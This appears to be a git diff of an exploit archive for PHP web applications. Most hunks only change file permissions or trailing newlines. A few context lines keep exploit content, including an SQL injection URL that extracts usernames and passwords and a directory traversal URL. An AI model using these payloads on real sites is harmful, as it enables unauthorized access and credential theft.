a/platforms/php/webapps/11778.txt b/platforms/php/webapps/11778.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11780.html b/platforms/php/webapps/11780.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11781.html b/platforms/php/webapps/11781.html old mode 100755 new mode 100644 index 7c1e2fd8e..247b713b6 --- a/platforms/php/webapps/11781.html +++ b/platforms/php/webapps/11781.html @@ -50,5 +50,4 @@ After execution refresh the page and u can see that a added content is deleted automatically. - #If you have any questions, comments, or concerns, feel free to contact me. - \ No newline at end of file + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/php/webapps/11782.txt b/platforms/php/webapps/11782.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11783.txt b/platforms/php/webapps/11783.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11784.txt b/platforms/php/webapps/11784.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11785.txt b/platforms/php/webapps/11785.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11788.txt b/platforms/php/webapps/11788.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11790.txt b/platforms/php/webapps/11790.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11795.txt b/platforms/php/webapps/11795.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11799.txt b/platforms/php/webapps/11799.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11801.txt b/platforms/php/webapps/11801.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11802.txt b/platforms/php/webapps/11802.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11805.txt b/platforms/php/webapps/11805.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11806.txt b/platforms/php/webapps/11806.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11807.txt b/platforms/php/webapps/11807.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11808.txt b/platforms/php/webapps/11808.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11811.txt b/platforms/php/webapps/11811.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11813.txt b/platforms/php/webapps/11813.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11814.txt b/platforms/php/webapps/11814.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11815.txt b/platforms/php/webapps/11815.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11816.txt b/platforms/php/webapps/11816.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11825.html b/platforms/php/webapps/11825.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11826.txt b/platforms/php/webapps/11826.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11829.txt b/platforms/php/webapps/11829.txt old mode 100755 new mode 100644 index 80cb740ec..5bb044dd3 --- a/platforms/php/webapps/11829.txt +++ b/platforms/php/webapps/11829.txt @@ -26,6 +26,4 @@ [+] Exploitable - http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1-- - - \ No newline at end of file + http://[host]/[path]/lexikon.php?action=show&id=null+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8+from+bb1_users+where+userid=1-- \ No newline at end of file diff --git a/platforms/php/webapps/11830.txt b/platforms/php/webapps/11830.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11831.txt b/platforms/php/webapps/11831.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11832.txt b/platforms/php/webapps/11832.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11833.txt b/platforms/php/webapps/11833.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11835.txt b/platforms/php/webapps/11835.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11836.txt b/platforms/php/webapps/11836.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11837.txt b/platforms/php/webapps/11837.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11840.txt b/platforms/php/webapps/11840.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11841.txt b/platforms/php/webapps/11841.txt old mode 100755 new mode 100644 index fb0bd2956..f521b0de7 --- a/platforms/php/webapps/11841.txt +++ b/platforms/php/webapps/11841.txt @@ -11,5 +11,4 @@ exploit: http://localhost.com/stack/documentation.php?action=/../../../../../../ =============================================================================================== Salam Hangat: S3T4N, JACK, MADONK, YOGA0400, EMINEM, YUDIS, VRS-HCK, OON_BOY, NOGE KECEMPLUNGKALEN, ALL MAINHACK, ALL SERVERISDOWN.ORG -================================================================================================ - \ No newline at end of file +================================================================================================ \ No newline at end of file diff --git a/platforms/php/webapps/11844.txt b/platforms/php/webapps/11844.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11845.txt b/platforms/php/webapps/11845.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11846.txt b/platforms/php/webapps/11846.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11848.txt b/platforms/php/webapps/11848.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11850.txt b/platforms/php/webapps/11850.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11851.txt b/platforms/php/webapps/11851.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11852.txt b/platforms/php/webapps/11852.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11853.txt b/platforms/php/webapps/11853.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11862.txt b/platforms/php/webapps/11862.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11863.txt b/platforms/php/webapps/11863.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11864.txt b/platforms/php/webapps/11864.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11865.txt b/platforms/php/webapps/11865.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11866.txt b/platforms/php/webapps/11866.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11867.txt b/platforms/php/webapps/11867.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11868.txt b/platforms/php/webapps/11868.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11871.txt b/platforms/php/webapps/11871.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11873.txt b/platforms/php/webapps/11873.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11874.txt b/platforms/php/webapps/11874.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11876.txt b/platforms/php/webapps/11876.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11881.php b/platforms/php/webapps/11881.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11882.txt b/platforms/php/webapps/11882.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11883.txt b/platforms/php/webapps/11883.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11884.txt b/platforms/php/webapps/11884.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11885.txt b/platforms/php/webapps/11885.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11888.txt b/platforms/php/webapps/11888.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11889.txt b/platforms/php/webapps/11889.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1189.c b/platforms/php/webapps/1189.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11892.txt b/platforms/php/webapps/11892.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11894.txt b/platforms/php/webapps/11894.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11895.txt b/platforms/php/webapps/11895.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11896.txt b/platforms/php/webapps/11896.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11897.php b/platforms/php/webapps/11897.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11899.html b/platforms/php/webapps/11899.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11902.txt b/platforms/php/webapps/11902.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11903.txt b/platforms/php/webapps/11903.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11904.txt b/platforms/php/webapps/11904.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11905.txt b/platforms/php/webapps/11905.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11906.txt b/platforms/php/webapps/11906.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11908.txt b/platforms/php/webapps/11908.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11912.txt b/platforms/php/webapps/11912.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11914.txt b/platforms/php/webapps/11914.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11915.txt b/platforms/php/webapps/11915.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11916.txt b/platforms/php/webapps/11916.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11917.txt b/platforms/php/webapps/11917.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11918.txt b/platforms/php/webapps/11918.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11919.txt b/platforms/php/webapps/11919.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11920.txt b/platforms/php/webapps/11920.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11922.txt b/platforms/php/webapps/11922.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11923.txt b/platforms/php/webapps/11923.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11924.txt b/platforms/php/webapps/11924.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11925.txt b/platforms/php/webapps/11925.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11927.txt b/platforms/php/webapps/11927.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11928.txt b/platforms/php/webapps/11928.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11929.txt b/platforms/php/webapps/11929.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11934.txt b/platforms/php/webapps/11934.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11935.txt b/platforms/php/webapps/11935.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11938.txt b/platforms/php/webapps/11938.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11939.txt b/platforms/php/webapps/11939.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11940.txt b/platforms/php/webapps/11940.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11941.txt b/platforms/php/webapps/11941.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11942.txt b/platforms/php/webapps/11942.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11943.txt b/platforms/php/webapps/11943.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11946.txt b/platforms/php/webapps/11946.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11947.txt b/platforms/php/webapps/11947.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11948.txt b/platforms/php/webapps/11948.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11949.txt b/platforms/php/webapps/11949.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11950.txt b/platforms/php/webapps/11950.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11954.txt b/platforms/php/webapps/11954.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11960.txt b/platforms/php/webapps/11960.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11962.txt b/platforms/php/webapps/11962.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11963.txt b/platforms/php/webapps/11963.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11965.txt b/platforms/php/webapps/11965.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11967.txt b/platforms/php/webapps/11967.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11968.txt b/platforms/php/webapps/11968.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11978.txt b/platforms/php/webapps/11978.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11980.txt b/platforms/php/webapps/11980.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11989.txt b/platforms/php/webapps/11989.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11990.txt b/platforms/php/webapps/11990.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11991.txt b/platforms/php/webapps/11991.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11992.txt b/platforms/php/webapps/11992.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11993.txt b/platforms/php/webapps/11993.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11994.txt b/platforms/php/webapps/11994.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11995.txt b/platforms/php/webapps/11995.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11996.txt b/platforms/php/webapps/11996.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11997.txt b/platforms/php/webapps/11997.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11998.txt b/platforms/php/webapps/11998.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/11999.txt b/platforms/php/webapps/11999.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1200.php b/platforms/php/webapps/1200.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12002.txt b/platforms/php/webapps/12002.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12003.txt b/platforms/php/webapps/12003.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12004.txt b/platforms/php/webapps/12004.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12005.txt b/platforms/php/webapps/12005.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12006.txt b/platforms/php/webapps/12006.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12007.txt b/platforms/php/webapps/12007.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12009.html b/platforms/php/webapps/12009.html old mode 100755 new mode 100644 index 4c1677696..1f18d46be --- a/platforms/php/webapps/12009.html +++ b/platforms/php/webapps/12009.html @@ -85,5 +85,4 @@ After execution just refresh the page and we can see that the admin user added automatically. - #If you have any questions, comments, or concerns, feel free to contact me. - \ No newline at end of file + #If you have any questions, comments, or concerns, feel free to contact me. \ No newline at end of file diff --git a/platforms/php/webapps/12015.txt b/platforms/php/webapps/12015.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12016.txt b/platforms/php/webapps/12016.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12017.txt b/platforms/php/webapps/12017.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12018.txt b/platforms/php/webapps/12018.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12019.txt b/platforms/php/webapps/12019.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1202.php b/platforms/php/webapps/1202.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12021.txt b/platforms/php/webapps/12021.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12022.txt b/platforms/php/webapps/12022.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12026.txt b/platforms/php/webapps/12026.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12028.txt b/platforms/php/webapps/12028.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12031.html b/platforms/php/webapps/12031.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12034.txt b/platforms/php/webapps/12034.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12037.txt b/platforms/php/webapps/12037.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12038.txt b/platforms/php/webapps/12038.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12041.txt b/platforms/php/webapps/12041.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12042.txt b/platforms/php/webapps/12042.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12043.html b/platforms/php/webapps/12043.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12045.html b/platforms/php/webapps/12045.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12047.html b/platforms/php/webapps/12047.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12048.html b/platforms/php/webapps/12048.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12049.html b/platforms/php/webapps/12049.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12050.txt b/platforms/php/webapps/12050.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12052.txt b/platforms/php/webapps/12052.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12054.txt b/platforms/php/webapps/12054.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12055.txt b/platforms/php/webapps/12055.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12056.txt b/platforms/php/webapps/12056.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12057.txt b/platforms/php/webapps/12057.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12058.txt b/platforms/php/webapps/12058.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12060.txt b/platforms/php/webapps/12060.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12061.txt b/platforms/php/webapps/12061.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12062.txt b/platforms/php/webapps/12062.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12065.txt b/platforms/php/webapps/12065.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12066.txt b/platforms/php/webapps/12066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12067.txt b/platforms/php/webapps/12067.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12068.txt b/platforms/php/webapps/12068.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12069.txt b/platforms/php/webapps/12069.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1207.php b/platforms/php/webapps/1207.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12070.txt b/platforms/php/webapps/12070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12071.txt b/platforms/php/webapps/12071.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12075.txt b/platforms/php/webapps/12075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12077.txt b/platforms/php/webapps/12077.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12078.txt b/platforms/php/webapps/12078.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12082.txt b/platforms/php/webapps/12082.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12083.txt b/platforms/php/webapps/12083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12084.txt b/platforms/php/webapps/12084.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12085.txt b/platforms/php/webapps/12085.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12086.txt b/platforms/php/webapps/12086.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12087.txt b/platforms/php/webapps/12087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12088.txt b/platforms/php/webapps/12088.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12089.txt b/platforms/php/webapps/12089.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12094.txt b/platforms/php/webapps/12094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12097.txt b/platforms/php/webapps/12097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12098.txt b/platforms/php/webapps/12098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12101.txt b/platforms/php/webapps/12101.txt old mode 100755 new mode 100644 index e18333a51..10452948b --- a/platforms/php/webapps/12101.txt +++ b/platforms/php/webapps/12101.txt @@ -28,6 +28,4 @@ Greetz : -:- SkyCreW -:- Nyubi (Solpot) , Vrs-hCk , OoN_BoY , NoGe , Paman , zxvf , home_edition2001 , mywisdom , s4va, Winda Slovski , stardustmemory, wishnusakti, Xco Nuxco , Cakill Schumbag, dkk -(o)===================================================================================(o) - - \ No newline at end of file +(o)===================================================================================(o) \ No newline at end of file diff --git a/platforms/php/webapps/12102.txt b/platforms/php/webapps/12102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12105.txt b/platforms/php/webapps/12105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12106.txt b/platforms/php/webapps/12106.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12107.txt b/platforms/php/webapps/12107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12108.txt b/platforms/php/webapps/12108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12111.txt b/platforms/php/webapps/12111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12112.txt b/platforms/php/webapps/12112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12113.txt b/platforms/php/webapps/12113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12115.txt b/platforms/php/webapps/12115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12118.txt b/platforms/php/webapps/12118.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12120.txt b/platforms/php/webapps/12120.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12121.txt b/platforms/php/webapps/12121.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12123.txt b/platforms/php/webapps/12123.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12124.txt b/platforms/php/webapps/12124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12128.txt b/platforms/php/webapps/12128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12134.txt b/platforms/php/webapps/12134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12135.txt b/platforms/php/webapps/12135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12136.txt b/platforms/php/webapps/12136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12137.txt b/platforms/php/webapps/12137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12138.txt b/platforms/php/webapps/12138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12139.txt b/platforms/php/webapps/12139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1214.php b/platforms/php/webapps/1214.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12140.php b/platforms/php/webapps/12140.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12141.txt b/platforms/php/webapps/12141.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12142.txt b/platforms/php/webapps/12142.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12143.txt b/platforms/php/webapps/12143.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12144.txt b/platforms/php/webapps/12144.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12145.txt b/platforms/php/webapps/12145.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12146.txt b/platforms/php/webapps/12146.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12147.txt b/platforms/php/webapps/12147.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12148.txt b/platforms/php/webapps/12148.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12149.txt b/platforms/php/webapps/12149.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12150.txt b/platforms/php/webapps/12150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12151.txt b/platforms/php/webapps/12151.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12153.txt b/platforms/php/webapps/12153.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12155.txt b/platforms/php/webapps/12155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12157.txt b/platforms/php/webapps/12157.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12159.txt b/platforms/php/webapps/12159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12160.txt b/platforms/php/webapps/12160.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12162.txt b/platforms/php/webapps/12162.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12163.txt b/platforms/php/webapps/12163.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12164.txt b/platforms/php/webapps/12164.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12166.txt b/platforms/php/webapps/12166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12167.txt b/platforms/php/webapps/12167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12168.txt b/platforms/php/webapps/12168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12169.txt b/platforms/php/webapps/12169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12170.txt b/platforms/php/webapps/12170.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12171.txt b/platforms/php/webapps/12171.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12172.txt b/platforms/php/webapps/12172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12173.txt b/platforms/php/webapps/12173.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12174.txt b/platforms/php/webapps/12174.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12175.txt b/platforms/php/webapps/12175.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12176.txt b/platforms/php/webapps/12176.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12177.txt b/platforms/php/webapps/12177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12178.txt b/platforms/php/webapps/12178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12179.txt b/platforms/php/webapps/12179.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12180.txt b/platforms/php/webapps/12180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12181.txt b/platforms/php/webapps/12181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12182.txt b/platforms/php/webapps/12182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12183.txt b/platforms/php/webapps/12183.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12184.txt b/platforms/php/webapps/12184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12185.txt b/platforms/php/webapps/12185.txt old mode 100755 new mode 100644 index e39d23db7..b4073d5bd --- a/platforms/php/webapps/12185.txt +++ b/platforms/php/webapps/12185.txt @@ -35,4 +35,4 @@ FLEXIcontent is an extension for Joomla! developed in 1.5 native mode and comply - [D]eal [C]yber 04/12/2010 GMT+7 \ No newline at end of file + [D]eal [C]yber 04/12/2010 GMT+7 \ No newline at end of file diff --git a/platforms/php/webapps/12187.txt b/platforms/php/webapps/12187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1219.c b/platforms/php/webapps/1219.c old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12190.txt b/platforms/php/webapps/12190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12191.txt b/platforms/php/webapps/12191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12192.txt b/platforms/php/webapps/12192.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12193.txt b/platforms/php/webapps/12193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12194.txt b/platforms/php/webapps/12194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12198.txt b/platforms/php/webapps/12198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12200.txt b/platforms/php/webapps/12200.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/1221.php b/platforms/php/webapps/1221.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12212.txt b/platforms/php/webapps/12212.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12219.txt b/platforms/php/webapps/12219.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12220.txt b/platforms/php/webapps/12220.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12222.txt b/platforms/php/webapps/12222.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12223.txt b/platforms/php/webapps/12223.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12224.txt b/platforms/php/webapps/12224.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12226.txt b/platforms/php/webapps/12226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12227.txt b/platforms/php/webapps/12227.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12230.txt b/platforms/php/webapps/12230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12231.txt b/platforms/php/webapps/12231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/12232.txt b/platforms/php/webapps/12232.txt old mode 100755 new mode 